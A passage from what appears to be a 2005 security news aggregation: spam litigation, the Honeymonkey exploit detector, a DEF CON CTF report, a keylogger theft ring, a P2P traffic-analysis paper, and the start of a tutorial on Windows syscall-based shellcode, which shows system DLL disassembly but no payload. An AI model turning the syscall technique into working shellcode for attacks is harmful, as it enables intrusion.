The settlement (announced Tuesday) is conditioned upon dismissal of the bankruptcy cases filed in March by Richter and OptInRealBig at the US Bankruptcy Court in Denver, itself a defensive move prompted by the massive damages a court might have awarded Microsoft if the case had gone to trial. Richter and his company have agreed to pay $7m to Microsoft. The settlement also stipulates that Richter, his company and his affiliates will continue to comply with US federal and state anti-spam laws, such as the CAN-SPAM Act. Richter has also agreed to three years of oversight.

We're in the money

Microsoft has ear-marked $5m of the settlement to expand its net security partnerships with governments and law enforcement agencies worldwide through various training, investigative and forensic assistance initiatives. The software giant is giving $1m to New York community centres to spend in computers. Microsoft doesn't say where the other $1m is going but our guess would be legal fees.

Richter was sued by New York State Attorney General Eliot Spitzer and brought to the brink of bankruptcy by Microsoft over allegations he used a network of 500 compromised computers to send millions of junk emails to hapless Hotmail users. Richter settled the NY lawsuit last July by agreeing to comply with CAN-SPAM and to shell out a modest $50K fine but that still left Microsoft's action hanging over his head.

In its lawsuit, Microsoft contended that Richter and his companies violated Washington and federal law by sending junk mail that contained "forged sender names, false subject lines, fake server names, inaccurate and misrepresented sender addresses and obscured transmission paths". Some of these spam messages touted home loans and the like were allegedly sent via compromised PCS.

Richter and OptInRealBig.com continue to deny these allegations but the terms of the settlement oblige Richter to provide a canned quote anyway stating that he'd changed his emailing practices "in part" because Microsoft and the New York Attorney General sued him. "In response to Microsoft’s and the New York Attorney General’s lawsuits, we made significant changes to OptInRealBig.com’s emailing practices and have paid a heavy price. I am committed to sending email only to those who have requested it and to complying fully with all federal and state anti-spam laws," Richter said.

Microsoft’s SVP and general counsel, Brad Smith, commented that because of this litigation, Richter had "fundamentally changed his practices and forfeited ill-gotten gains". He added that Microsoft will continue to combat spam through a combination of technology, consumer education and enforcement. ®

Microsoft trying to track down women engineers

Microsoft has vowed to track how many women it has certified as engineers after its ignorance of candidates’ genders hampered an academic investigation of lady-friendly training methods.

Open University researchers wanted to know how many women trained in the UK as Microsoft Certified Systems Engineers (MCSE), how many took the exams, and how many subsequently took jobs.

But, Microsoft - which is providing official support for the British government’s Computer Clubs for Girls scheme - first said it couldn’t give out a gender breakdown of its certified engineer roster, before admitting it simply didn’t know.

Dr. Debbie Ellen, an OU research fellow and co-author of the report, said: “Microsoft said it doesn’t give out this information because of data privacy laws”.

Ellen went straight to the Information Commissioner, the UK’s enforcer of data protection laws. The IC gave her a special ruling that showed Microsoft’s co-operation would not offend the law.

She showed this to her Microsoft contacts, Ram Dhaliwal, training and certification manager at Microsoft, and Bronwyn Kunhardt, Microsoft UK’s head of corporate reputation and diversity.

“Neither of them responded,” she said.

Dhaliwal stuck to his data privacy defence when approached by The Register but, when pressed, admitted it could not share the data because it does not track the gender of its engineering trainees.

“The MCSE goals are owned by the individual, so from a data privacy point of view we don’t hold anything,” he said.

“We hold the data at a world-wide level. The only information we have is how many MCSEs, how many MCEs et cetera. But not gender,” he added.

Diliwal did admit, however, that the data might exist.

Kunhardt, who five months ago took the newly created diversity post at Microsoft UK, vowed to investigate the matter.

“I’m trying to get it put through that we go back through all the MCS applications we have to collect the gender data,” she added.

“I’m trying to get them to collect a whole host of diversity data,” Kunhardt added.

The Open University study - Training and Employment of Women ICT Technicians: a report of the JIVE MCSE project - sought to determine if women-only training environments would help more women become Microsoft certified engineers.

It was not able to draw its conclusion without comparing the success rate of the women only programme it studied (http://www.jivepartners.org.uk) with the success rate of women who take the usual route into Microsoft engineering.

Male training environments can confirm women’s suspicions that IT is an industry for boys. Anecdotal evidence in the OU report found that women were grateful of JIVE’s women-only environment.

Women reported that their training was hindered on regular training courses because they were intimidated by overbearing men.

“Whenever I go on a training course I am normally the only female there!...Whereas the Women’s Workshop...there’s no testosterone flying around for competition,” said one trainee.

“Comparing it to courses where men have been involved...they tend to take over and I sort of sit there like a shy violet at the back and not say anything, whereas with a group of women, it seems to be much easier to make a fool of yourself sometimes and not worry about it,” said another.

Of those women who do go into IT, most get stuck in lowly jobs. Two-thirds of database assistants and clerks are women, according to the ONS, while 80 to 89 per cent of more desirable posts are held by men.

Rachel Burnett, a vice president of the British Computer Society, who is opening a new forum for women in the Autumn, said: “We need to collect information on women in IT.”

“If we had better strategic information that would help us know how we could increase access for women,” she added.

Since 1997 the proportion of women working in IT has fallen by over a quarter, from 27 per cent to 21 per cent, according to the Office of National Statistics (ONS).

For computer engineering jobs the proportion of women in training is as low as five to 10 per cent, according to Azlan Professional services. Fewer are thought to take the exams and subsequently get jobs.®

ID theft automated using keylogger Trojan

Anti-spyware researchers have uncovered a massive identity theft ring linked to keylogging software. The malware was discovered by Patrick Jordan of Sunbelt Software while doing research on the infamous CoolWebSearch application but the key logger itself is not CWS. It's far nastier.
During the course of infecting a machine, Jordan discovered that the machine became a spam zombie that was also sending data back to a remote server. He found that thousands of infected machines are contacting a US-based server daily and a portion of these are writing to a keylogger file, which is periodically harvested by cybercriminals. "The types of data in this file are pretty sickening to watch. You have search terms, social security numbers, credit cards, logins and passwords, etc," Sunbelt president Alex Eckelberry writes.

Sunbelt has contacted some of the affected individuals to warn them their personal details had been exposed. It has also informed the FBI. It remains unclear if the keylogger is directly related to CWS or not. Sunbelt advises consumers to use a personal firewall to prevent the key logger from "phoning home".

The use of key logging software on an industrial scale is rare but not unprecedented. Malware can be programmed to send back sensitive information to designated servers, in some cases logging into the servers using passwords written into viral code. Security researchers able to reverse engineer items of malware can extract this password and location information and use it to monitor hacker activity. ®

Annual hacking game teaches security lessons

LAS VEGAS -- The weekend-long Capture the Flag tournament stressed code auditing as a measure of hacking skill this year, a move that emphasized more real-world skills, but not without controversy.

The annual Capture the Flag tournament at DEF CON has always attracted participants from a variety of background, looking to try their hands at online attack and defense. Under a new set of organizers this year, the game pitted teams and individuals against each other to find and exploit vulnerabilities in their opponents' systems to score points. The game, dubbed "WarGamez" this year, put more emphasis on real-world skills compared to previous years, said Giovanni Vigna, associate professor of computer science at the University of California at Santa Barbara and the leader of team Shellphish, which won the event.

"The game required skills that are also required by both security researchers and hackers, such as ability to analyze attack vectors, understanding and automating attacks, finding new, unpredictable ways to exploit things," Vigna said. "It's about analyzing the security posture of a system that is given to you and about which you initially know nothing."

The latest incarnation of the game--run by a group of security professionals who asked to only be identified by their group name, Kenshoto--attracted students, military computer experts, security professionals and hobbyist hackers. For the teams, the controversy surrounding security researcher Michael Lynn's outing of a high-profile vulnerability in Cisco Systems' routers, mattered little. Finding vulnerabilities in each other's servers became the focus of their world.

In previous years, the game allowed each side to run their own server, and required that certain services be available. This year, the organizers ran a central server on which each team's virtual server ran.

The move was not without controversy, however, as it removed from the contest any teams that concentrated on defending their systems by using a specialized operating system, said Crispin Cowan, director of software engineering for Novell's Linux division, SUSE.

"Prior games involved both attackers and defenders working on the problem, but because Kenshoto took total control of the reference servers to be defended, there is very little defense that can be deployed," Cowan said. "Their scoring system also made defense essentially worthless other than to deny other teams points."

Cowan competed for several years as the leader of a team fielded by secure Linux operating system vendor Immunix, which was bought by Novell in May. Porting services over to its security-enhanced operating system became a signature strategy of the team.

The Capture the Flag game is suppose to measure security researchers and hackers abilities to attack and defend systems, said one of the organizers, not necessarily be a test of products.

"We did intentionally de-emphasize defense, because it is a hacking competition, after all," said the organizer. By agreement, the group that ran the game adopted the name Kenshoto and would only speak anonymously. "However, defensive skills were tested."

Some teams had success deploying Tripwire, a data-integrity checker that can find changed files, and monitoring traffic with an intrusion detection system, he said. A knowledgeable defender could also lockdown the systems, further hardening them. Moreover, the amount of uptime for each service directly affected the score, so defending the applications that ran the services became a key strategy, the organizers said.

In the end, however, the game focused on finding and exploiting vulnerabilities.

"What it takes to be an elite hacker is to find vulnerabilities in custom software," said the Kenshoto member. "It is not code auditing per se. They have to reverse engineer, and we have made it difficult to reverse engineer."

The Kenshoto group ran all the teams' virtual servers on a single machine using a technique known as "jailing," which limits each team or individual to separate directories on the master system. The computer ran the FreeBSD operating system and utilities and services were written in Python, Java and C. The group also ran an in-game auction site known as eDay.

Each team's authentication token, or totem, was placed on the bottom of a can of Tab, which the team was expected to guard.

While a few individuals and teams used the eDay auction site, most of the deals for items were done behind the scene, according to one member of Kenshoto. One team's can of Tab, which held the team's secret code on the bottom, went for 101 beers, the organizer said.

The teams each sought to score points by keeping services running, stealing or overwriting digital tokens on each server, and producing advisories with working exploit code. Rooting the main Kenshoto mainframe would earn massive points, according to the rules, but a failed attempt would penalize the team "back into the stone age."

Auditing did play a big role in the game's strategy, said the Kenshoto organizers, because finding flaws is a major factor in attack and defense in the real online world.

"The auditing people did as part of the game was similar to the job of anyone trying to find risks in third party software, be it a black hat or someone trying to determine whether third-party software is safe to integrate with an existing system," said one organizer.

Notable differences, however, include the time pressure, the fact that participants not only had to find a vulnerability but exploit the flaw, and that the teams did not have access to any source code.

The winning strategy balanced finding flaws with hardening the systems services, said Vigna of the winning team Shellphish.

"On the defense side, we had people responsible for monitoring--both manually and using automated tools--incoming traffic and running processes to find out how we were attacked," he said. "We also had people that make sure that our services were up an running ... Finally, we had people who would choose a service and try to find exploitable vulnerabilities."

In the end, however, Novell's Cowan remained unconvinced that focusing on finding flaws in arbitrary systems had much to do with real-world network security.

"The Kenshoto game is not invalid, it just focuses specifically on code auditing to the exclusion of all else," Cowan said. "If Kenshoto's game of this year persists, then ... anyone else with any significant interest in defense (will not participate), and the game will be entirely dominated by code analysis players."

Correction: The original article incorrectly identified the programming languages used to write the applications for the Capture the Flag game. The languages are Python, Java, and C.

Microsoft's "monkeys" find first zero-day exploit

Microsoft 's experimental Honeymonkey project has found almost 750 Web pages that attempt to load malicious code onto visitors' computers and detected an attack using a vulnerability that had not been publicly disclosed, the software giant said in a paper released this month.Known more formerly as the Strider Honeymonkey Exploit Detection System, the project uses automated Windows XP clients to surf questionable parts of the Web looking for sites that compromise the systems without any user interaction. In the latest experiments, Microsoft has identified 752 specific addresses owned by 287 Web sites that contain programs able to install themselves on a completely unpatched Windows XP system.

Honeymonkeys, a name coined by Microsoft, modify the concept of honeypots--computers that are placed online and monitored to detect attacks.

"The honeymonkey client goes (to malicious Web sites) and gets exploited rather than waiting to get attacked," said Yi-Min Wang, manager of Microsoft's Cybersecurity and Systems Management Research Group. "This technique is useful for basically any company that wants to find out whether their software is being exploited this way by Web sites on the Internet."

The experimental system, which SecurityFocus first reported on in May, is one of the software giant's many initiatives to make the Web safer for users of the Windows operating system. Online fraudsters have become more savvy about fooling users, from more convincing phishing attacks to targeting individuals who likely have access to high-value data. Some statistical evidence has suggested that financial markets are holding software makers such as Microsoft responsible for such problems.

The software giant has not focused on any single strategy to secure its customers. A year ago, the company released a major update, known as Service Pack 2, to its Windows XP operating system--an update that focused almost exclusively on security. The company has also started working closer with the independent security researchers and hackers that find the flaws in its operating system and offering rewards for information on the virus writers that have historically attacked its software.

The honeymonkey project, first discussed at the Institute of Electrical and Electronics Engineers' Symposium on Security and Privacy in Oakland, California in May, is the latest attempt by the software giant to detect threats to its customers before the threats become widespread. The honeymonkeys consist of virtual machines running different patch levels of Windows. The "monkey" programs browse a variety of Web sites looking for sites that attempt to exploit browser vulnerabilities.

Security researchers have given the initiative high marks.

"In terms of detection capabilities, it's a really elegant hack," said Dan Kaminsky, principal security researcher for Doxpara Research. "The antivirus model -- scan for dangerous patterns -- can't find previously unknown attacks. ... No, the best way to find out if a web page, if executed, would attack the browser is to spawn a browser and let it execute potentially hostile code."

New tactics like honeymonkeys will be a useful way to stave off the dangers of the Internet, said Lance Spitzner, president of the Honeynet Project, which creates software and tools for administering false networks of systems that appear to be vulnerable targets.
Where the Honeynet Project focuses on fake servers to lure in attackers, client-side honeypots, what Microsoft has called honeymonkeys, are important as well, Spitzner said.

"As the bad guys continue to adapt and change, so too must we," he said.

In the first month, Microsoft's legion of honeymonkeys found 752 different addresses at 287 Web sites that exploited various vulnerabilities in Windows XP, according to a paper published last week. The researchers determine whether each monkey's system has been compromised by using another ongoing project, the Strider Flight Data Recorder, which detects changes to system files and registries. The Monkey Controller kills the infected virtual machine and restarts a new one that picks up scanning the original monkey's list. Another monkey program, running a different patch level of Windows, tries the original Internet address to detect the strength of the exploit.

In early July 2005, the project discovered its first exploit for a vulnerability that had not been publicly disclosed, the researchers said in the paper. The attack used the JView profiler vulnerability that Microsoft announced later in July. Known as "zero-day" exploits, such attack methods could be especially pernicious if widely used before Microsoft updated its user base with protections. In fact, the network of Web sites that use such attacks, which researcher Want has dubbed the Exploit-Net, seem to share exploits. Within 2 weeks of the initial discovery, 40 of the 752 Web sites adopted the exploit.

Microsoft believes that the sites could act as canaries in a coal mine, alerting the company to dangerous zero-day exploits, before the attacks gained widespread usage.

"Our conjecture is that these Web sites are the popular ones, because we could find them in one month, and so, if we kept monitoring the sites, we could catch new exploits very fast, because any new exploit would quickly be picked up by these sites," said Wang.

Microsoft's Security Response Center, the group that acts on vulnerability information, will used the honeymonkey system to keep it apprised of future zero-day attacks, said Stephen Toulouse, program manager for the MSRC.

"It is not just important for us to know that... but for customers to know that it is being exploited, so they can get patches quickly," Toulouse said.

Among the researchers other findings is that even a partially patched version of Windows XP Service Pack 2 blocks the lion's share of attacks, cutting the number of sites that could successfully compromise a system from 287 for an unpatched system to 10 for a partially patched Windows XP SP2 system. A fully patched Windows XP SP2 systems could not be compromised by any Web sites, according to the group's May-June data. (The zero-day exploit of javaprxy.dll happened after this data set.)

Microsoft plans to continue the honeymonkey research to collect new information on threats. In the end, such research could help put the source of such attack behind bars. After investigating sites that use exploits to compromise systems, Microsoft plans to forward the information to law enforcement, said Scott Stein, an attorney with Microsoft's Internet Safety Enforcement Team and former U.S. Department of Justice prosecutor.

"Our mission is to keep the Internet safe--for that mission, this is a great lead generation tool," Stein said.

Sunday, August 07, 2005

Identifying P2P users using traffic analysis

With the emergence of Napster in the fall of 1999, peer to peer (P2P) applications and their user base have grown rapidly in the Internet community. With the popularity of P2P and the bandwidth it consume, there is a growing need to identify P2P users within the network traffic.

In this paper the author will propose a new method based on traffic behavior that helps identify P2P users, and even helps to distinguish what type of P2P applications are being used.
Current Technology
When it comes to identifying P2P users, currently there are only two choices: port based analysis and protocol analysis. Here is a brief review of both.
Port based analysis
Port based analysis is the most basic and straightforward method to detect P2P users in network traffic. It is based on the simple concept that many P2P applications have default ports on which they function. When these applications are run, they use these ports to communicate with outside. The following is a example list:

Limewire 6346/6347 TCP/UDP
Morpheus 6346/6347 TCP/UDP
BearShare default 6346 TCP/UDP
Edonkey 4662/TCP
EMule 4662/TCP 4672/UDP
Bittorrent 6881-6889 TCP/UDP
WinMx 6699/TCP 6257/UDP

To perform port based analysis, administrators just need to observe the network traffic and check whether there are connection records using these ports. If a match is found, it may indicate a P2P activity. Port based analysis is almost the only choice for network administrators who don't have special software or hardware (such as an IDS) to monitor traffic.

Port matching is very simple in practice, but its limitations are obvious. Most P2P applications allow users to change the default port numbers by manually selecting whatever port(s) they like. Additionally, many newer P2P applications are more inclined to use random ports, thus making the ports unpredictable. Also there is a trend for P2P applications begin to masquerade their function ports within well-known application ports such as port 80. All these issues make port based analysis less effective.
Protocol analysis
Despite the poor results found using simple port matching, an administrator has another choice: application layer protocol analysis.

With this approach, an application or piece of equipment monitors traffic passing through the network and inspects the data payload of the packets according to some previously defined P2P application signatures. Many of today's commercial and open source P2P application identification solutions are based on this approach, and include the L7-filter, Cisco's PDML, Juniper's netscreen-IDP, Alteon Application Switches, Microsoft common application signatures, and NetScout. They each do their detection work by doing regular expression matches on the application layer data, in order to determine whether a special P2P application is being used.

Because protocol analysis focuses on the packet payload and raises alerts only on a definite match, any client-side tricks that use non-default or dynamic ports to avoid detection by P2P applications will fail. Using this approach, the result is normally more accurate and believable, but it still has some shortcomings. Here are some points to remember with protocol analysis of P2P networks:

* P2P applications are evolving continuously, and therefore signatures can change. Static signature based matching requires new signatures to be effective when these changes occur.
* With more and more P2P identification and control products on the market, P2P developers tend to tunnel around any controls placed in their way. They could easily achieve this by encrypting the traffic, such as by using SSL, making protocol analysis much more difficult.
* Signature-based identification means that the product should read and process all network traffic, which brings up the issue of how to maintain network stability in a large network. The product may burden network equipment heavily or even cause network failures. If it works inline, what will you do when the product fails?
* Signature-based identification at the application level (L7) is also highly resource- intensive. The higher bandwidth network, the more cost and resources you need to inspect it. Suppose you inspect a 1Gbit or even 10Gbit network link, how much investment must you make to get an appropriate product?

Most importantly, if your organization cannot afford the special appliances or applications that perform protocol analysis, is port matching your only alternative? Fortunately, the answer is no. An approach based on traffic behavior patterns proves to be both functional and cost-effective.
Traffic behavior
Network traffic information can usually be easily retrieved from various network devices without affecting network performance or service availability too much. For small or medium networks, administrators can rely on their gateway or perimeter equipment logs. For larger networks and ISPs, administers can enable the Netflow function on their routers or switches to export network traffic records.
Although network traffic information is still coarse in some degree, there is valuable information inside the traffic and useful patterns can be uncovered. Looking at host UDP sessions is one good example of this.
Identifying P2P users
The author of this paper has found that a unique traffic behavior to UDP connection pattern exists with P2P applications. This can be used to process network traffic and find out which hosts are running P2P applications in a decentralized network structure. And all that needed is the network traffic records.

What exactly does it mean to look at a UDP connection pattern, and how can it help us? Before answering these questions, let's review the first popular P2P application, Napster.
Centralized, decentralized and hybrid P2P networks
Napster, written by Shawn Fanning, was first launched in May 1999 and was the first generation of a P2P network. Napster's network structure was centralized, which means it was made up of two elements: central index servers and peers. Central index servers were setup by Napster, which maintained the shared music file information of every online peer. When an active peer wanted to download a music file, it sent an inquiry to Napster's central index server and the latter looked up the request its database and sent back a list of which peers had the desired music files. Then the peer can make direct connection to the peers in the list to get the file.

The network structure of Napster has an Achilles Heel -- it is highly dependent on the static central server. If the central server is down, the network will collapse. This was shown by the actions of the recording industry, which forced the original Napster to be shutdown.

The Napster case illustrates the vulnerability of a centralized network structure and greatly affects the subsequent P2P application. For legal, security, scalability, anonymity and some other reasons, more and more P2P applications nowadays work in a totally or partially decentralized network structure, or are moving in the direction. Major P2P file-sharing networks and protocols, such as Edonkey2k, FastTrack, Gnutella, Gnutella2, Overnet, Kad, all use this concept.

Here the author must make it clear that Bittorrent is not a general purpose P2P network although it is a popular P2P application. It still needs tracker servers; while the network structure of Bittorrent is partially decentralized, the technique discussed in this article can't be used to identify Bittorrent users.

Decentralized means a network structure with no dedicated central index servers. It is a trend for P2P evolution. Today, there are many P2P camps using their own network and protocol, but normally their network structures are totally or partially decentralized. Some P2P applications such as EMule and Edonkey support fully decentralized protocols such as Kademlia, which needs no servers at all. And as a partially decentralized model, hybrid decentralized networks have won broad support from various P2P applications and are thus recognized as the most popular P2P network model.

In a hybrid decentralized network, there are still central servers, but they are no longer dedicated and static. Instead, some peers with more power (CPU, DISK, Bandwidth, and active time) will automatically take over the central indexing server functions, which are called ultrapeers (Supernodes). Every one of them is elected from normal peers and each serves a group of normal peers. They communicate with each other to form the backbone of hybrid decentralized network. New ultrapeers are continuously added when appropriate peers join the network. At the same time, ultrapeers are removed when they leave the network.

In order to join the network, a peer must find a way to connect with one or a few of the live ultrapeers. They get the ultrapeer list by some means such as a bootstrap stored in the program or download from special web site. After connecting to a proper ultrapeer, apart from the normal file transfer work, the P2P application must interact with the P2P network to help them keep connected and live happily in the network, uploading information to the server, checking the status of ultrapeer to which they are connected, getting the most current available ultrapeers, comparing the available ultrapeers situations, actively switching to a better ultrapeer, searching files, probing the status of file suppliers, storing available ultrapeers for future use, and so on. In short, besides the real file transfer traffic itself, peers need to send out many control packets (probe, inform and some other packets) to various different hosts to keep up with the changing network environment in real time. This is the first key element of our traffic behavior identification: peers need many control purpose packets sent out to interact with the decentralized network during their lifetime.
UDP connection patterns
Today almost all P2P applications using a decentralized structure have a built-in module to fulfill their interaction work, because there are many control purpose packets needed to be sent out to many destinations. A great deal of the modern P2P networks and protocols select UDP as the carrying protocol.

Why do they select UDP? UDP is simple, effect and low-cost. It does not need to provide guarantee for packet delivery, establish connection, or maintain connection state. All these features make UDP fit for fast delivery of data to many destinations. These are just what P2P applications need. Inspecting different P2P applications carefully, you will find most of the modern decentralized P2P applications adopt a similar network behavior. When they startup, they create one or several UDP sockets to listen, and then communicate with abundant outside addresses during their life by using these UDP ports to assist their interaction in the P2P world. This is the second key element of our traffic behavior identification: peers keep using one or several UDP ports to make connections to fulfill the control work.

Now, let's turn to a popular P2P application, Edonkey2000, to see how it can be identified.

Edonkey2000 UDP traffic example

The following is a trace file of Edonkey's outgoing UDP traffic. The output display here is sanitized, so it is only a fraction of the captured traffic. In fact, for this example there were 390 records in just two minutes. For example purposes, the source address is replaced with x and the first column of destination address is replaced with y.

11:24:19.650034 IP x.10810 > y.34.233.22.8613: UDP, length: 25
11:24:19.666047 IP x.2587 > y.138.230.251.4246: UDP, length: 6
11:24:19.666091 IP x.10810 > y.127.115.17.4197: UDP, length: 25
11:24:19.681433 IP x.10810 > y.76.27.4.4175: UDP, length: 25
11:24:19.681473 IP x.2587 > y.28.31.240.4865: UDP, length: 6
11:24:19.696907 IP x.2587 > y.162.178.102.4265: UDP, length: 6
......
11:24:20.946921 IP x.2587 > y.250.47.34.4665: UDP, length: 6
11:24:20.962509 IP x.2587 > y.152.93.254.4665: UDP, length: 6
11:24:20.978275 IP x.2587 > y.28.31.241.5065: UDP, length: 6
11:24:20.993871 IP x.2587 > y.135.32.97.580: UDP, length: 6
11:24:21.009621 IP x.2587 > y.149.102.1.4246: UDP, length: 6
11:24:29.681224 IP x.10810 > y.32.97.189.5312: UDP, length: 4
11:24:29.696903 IP x.10810 > y.10.34.181.7638: UDP, length: 4
11:24:29.716503 IP x.10810 > y.26.234.251.12632: UDP, length: 4
......
11:26:20.291874 IP x.10810 > y.19.149.0.21438: UDP, length: 19

From the output, we can see that all traffic is coming from two source ports, UDP 2587 and UDP 10810 (These ports are randomly selected by Edonkey and the port numbers on different hosts will be different). The destination IP addresses are diverse. In fact, Edonkey uses one port to send out server status requests to the Edonkey servers, and uses another port to make connection, IP query, search, publicize and some other work.
Finding the pattern
A study of some other decentralized P2P applications, such as BearShare, Skpye, Kazaa, EMule, Limewire, Shareaza, Xolox, MLDonkey, Gnucleus, Sancho, and Morpheus leads to a similar result. All these applications have the same connection pattern: they use one or several UDP ports to communicate with many outside hosts during their lifetime. Describing this pattern in the network layer, it can be summarized as:

For a period of time(x), from on single IP, fixed UDP port -> many destination IP(y), fixed or random UDP ports

Experience shows that when x equals five, y equals three, as administrators scanning for a P2P application we will get a satisfying result. Administrators can change x and y values to get more precious or rough result according to their requirement.

In practice, we can export network connection records from corresponding equipment and use a database and shell scripts to process them. For every given minute, if the result shows that any host sends out some number of UDP packets to different hosts from a fixed source port, it is highly probable that the host is a P2P host.

The author of this article setup a test environment on one of China's largest ISP nodes. The network connection records were exported from the router as Netflow data and stored into a MySQL database. With the help of a little script to process all the data, many hosts were identified as P2P peers, and some interesting, locally developed P2P new applications were also discovered.
Dealing with false positives
This sounds like a good method to perform P2P host identification, but what about false positives? Fortunately, this kind of network traffic behavior is seldom seen in other types of usage around the Internet. An exception to this would be if the host is a traditional game server, DNS server or media server. This kind of server will also produce traffic records in which many UDP packets are sent out to many different IP addresses from a single source. But administrators can easily distinguish whether a host is a traditional server because a server normally will not send any kind of traffic on ports other than their functional port, which is not the model used by a P2P host.

The value of this UDP connection pattern is obvious: this approach does not need any kind of application layer information, yet the result is still quite satisfactory. It does not rely on any kind of signatures so newly developed P2P application can still be identified quickly in large networks. Meanwhile, analyzing the network layer information requires almost no extra software of hardware, and dramatically reduces the pressure that might otherwise be put on corresponding equipment.

Disadvantages of this approach

To be sure, this UDP session method also has two disadvantages: it can only be used to identify P2P applications that use a decentralized structure (although most of the modern P2P applications are indeed decentralized). Second, if the P2P application chooses TCP rather than UDP to perform its control function, our identification work will fail.
Identifying P2P applications
Up to this point we have identified P2P users by relying on network connection records. We now go one step further to identify what exactly P2P application a host is running without the help of any high level layer data.

Examining the UDP traffic of different P2P applications more carefully, you will find even more interesting patterns. It has been mentioned that a decentralized network structure needs control purpose packets, and it is not difficult to understand that for a dedicated P2P application, there are many kinds of control packets. Packets of the same control purpose are very often identical in size. Therefore, the UDP packet can even help us identify exactly which P2P application is running, in the absence of any higher level information.

Most of P2P applications do not have complete documentation on their implementation details and some of them are closed source, so we are still unclear exactly what the makeup is of most applications' UDP packets. Therefore, the author of this article has randomly selected seven decentralized, popular P2P applications and made such observations. The result confirm the hypothesis, that all these applications use some fixed length packets to contact outside.

* Edonkey2000
Edonkey2000 uses many 6 byte UDP packets to send out 'server status request'. These kind of packets will mostly be seen when Edonkey launches. Additionally, the packet performing search function is almost always seen, and has a length of 25 bytes.

* BearShare
When BearShare launches, it first sends out UDP packets with a length of 28 bytes to many different destinations. Every time BearShare launches a file transfer task, there will be a lot of UDP packets each with a length of 23 bytes, sent out to file suppliers.

* Limewire
Limewire uses many 35 byte and 23 byte UDP packets, sent out when Limewire starts. Every time a download task starts, there will be many 23 byte UDP packets communicating with the outside.

* Skype
Skype will startup with many 18 byte UDP packets to communicate with the outside.

* Kazaa When Kazaa launches, it sends out UDP packet with a length of 12 bytes to many different destinations

* EMule
When you start EMule and select a server to get connected, there will be continuously many 6 byte UDP packets sent out to perform 'server status request' and 'get server info'. If you choose to connect to a Kad network in EMule, there will be continuously 27 byte and 35 byte UDP packets appearing in the connection traffic.

* Shareaza
During Shareaza's lifetime, you will discover that there are continuously 19 byte UDP packets found in the traffic.

The result of these simple tests is quite interesting. It means that after identifying the peers in the network records, we could use this technology to determine in the future what exactly a peer uses. However, research on the size of different P2P applications' control packets is still in its infant stage and there are many things left to do. For a detailed and accurate result, each application may need special focus and a lot of research work is still needed.

Furthermore, there are other means that can be used and combine with the methods we discussed in this article to better identify P2P users and P2P applications. Some P2P applications will make connections to fixed outside IP addresses to perform such functions as version checks, authentication, downloading bootstrap, or even advertising. For example, Kazaa will connect to ssa.Kazaa.com, desktop.Kazaa.com and some other sites when it operates. Skype will make TCP connection to ui.skype.com whenever it startups.

Also there are other aspects about traffic behavior, such as data transferred. Connection duration may be used in P2P identification but this adds another level of complexity.
Conclusion
As always, there is no one-fit-all solution for the P2P identification work. Although port based analysis and protocol analysis are currently the most important and commonly used technologies, we should not feel content with them. Try a brain head storming, there may be another method cropping up to reinforce the P2P identifies solution.

Acknowledgement

My special thanks to Kelly Martin for his careful review and suggestions!

Six patches for MS August Patch Tuesday

In brief Microsoft plans to release six patches next Tuesday, 9 August. All of the patches involve Microsoft Windows and at least one is critical, according to minimalist details from an advance bulletin notification from Redmond issued Thursday. ®

Windows Syscall Shellcode

Introduction
This article has been written to show that is possible to write shellcode for Windows operating systems that doesn't use standard API calls at all. Of course, as with every solution, this approach has both advantages and disadvantages. In this paper we will look at such shellcode and also introduce some example usage. IA-32 assembly knowledge is definitely required to fully understand this article.

All shellcode here has been tested on Windows XP SP1. Note that there are variations in the approach depending on the operating system and service pack level, so this will be discussed further as we progress.
Some background

Windows NT-based systems (NT/2000/XP/2003 and beyond) were designed to handle many subsystems, each having its own individual environment. For example, one of NT subsystems is Win32 (for normal Windows applications), another example would be POSIX (Unix) or OS/2. What does it mean? It means that Windows NT could actually run (of course with proper os add-ons) OS/2 and support most of it features. So what changes were made as the OS was developed? To support all of these potential subsystems, Microsoft made unified set of APIs which are called wrappers of each subsystem. In short, all subsystems have all the needed libraries for them to work. For example Win32 apps call the Win32 Subsystem APIs, which in fact call NT APIs (native APIs, or just natives). Natives don't require any subsystem to run.

From native API calls to syscalls
Is this theory true, that shellcode can be written without any standard API calls? Well, for some APIs it is for some it isn't. There are many APIs that do their job without calling native NT APIs and so on. To prove this, let's look at the GetCommandLineA API exported from KERNEL32.DLL.

.text:77E7E358 ; --------------- S U B R O U T I N E -------------------------
.text:77E7E358
.text:77E7E358
.text:77E7E358 ; LPSTR GetCommandLineA(void)
.text:77E7E358 public GetCommandLineA
.text:77E7E358 GetCommandLineA proc near
.text:77E7E358 mov eax, dword_77ED7614
.text:77E7E35D retn
.text:77E7E35D GetCommandLineA endp

This API routine doesn't use any arbitary calls. The only thing it does is the return the pointer to the program command line. But let's now discuss an example that is in line with our theory. What follows is part of the TerminateProcess API's disassembly.

.text:77E616B8 ; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
.text:77E616B8 public TerminateProcess
.text:77E616B8 TerminateProcess proc near ; CODE XREF: ExitProcess+12 j
.text:77E616B8 ; sub_77EC3509+DA p
.text:77E616B8
.text:77E616B8 hProcess = dword ptr 4
.text:77E616B8 uExitCode = dword ptr 8
.text:77E616B8
.text:77E616B8 cmp [esp+hProcess], 0
.text:77E616BD jz short loc_77E616D7
.text:77E616BF push [esp+uExitCode] ; 1st param: Exit code
.text:77E616C3 push [esp+4+hProcess] ; 2nd param: Handle of process
.text:77E616C7 call ds:NtTerminateProcess ; NTDLL!NtTerminateProcess

As you can see, the TerminateProcess API passes arguments and then executes NtTerminateProcess, exported by NTDLL.DLL. The NTDLL.DLL is the native API. In other words, the function which name starts with 'Nt' is called the aative API (some of them are also ZwAPIs - just look what exports from the NTDLL library). Let's now look at NtTerminateProcess.

.text:77F5C448 public ZwTerminateProcess
.text:77F5C448 ZwTerminateProcess proc near ; CODE XREF: sub_77F68F09+D1 p
.text:77F5C448 ; RtlAssert2+B6 p
.text:77F5C448 mov eax, 101h ; syscall number: NtTerminateProcess
.text:77F5C44D mov edx, 7FFE0300h ; EDX = 7FFE0300h
.text:77F5C452 call edx ; call 7FFE0300h
.text:77F5C454 retn 8
.text:77F5C454 ZwTerminateProcess endp

This native API infact only puts the number of the syscall to eax and calls memory at 7FFE0300h, which is:

7FFE0300 8BD4 MOV EDX,ESP
7FFE0302 0F34 SYSENTER
7FFE0304 C3 RETN

And that shows how the story goes; EDX is now user stack pointer, EAX is the system call to execute. The SYSENTER instruction executes a fast call to a level 0 system routine, which does rest of the job.
Operating system differences

